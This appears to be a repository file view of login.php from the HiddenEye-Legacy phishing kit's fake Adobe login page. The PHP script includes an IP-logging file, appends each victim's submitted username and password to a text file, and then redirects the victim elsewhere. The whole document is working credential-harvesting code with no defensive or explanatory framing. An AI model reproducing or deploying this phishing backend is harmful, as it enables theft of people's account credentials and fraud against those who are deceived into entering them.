HiddenEye-Legacy/WebPages/adobe/login.php

7 lines
186 B
PHP
Raw Normal View History

2019-04-21 18:08:25 +08:00
<?php
include 'ip.php';
file_put_contents("usernames.txt", "Account: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();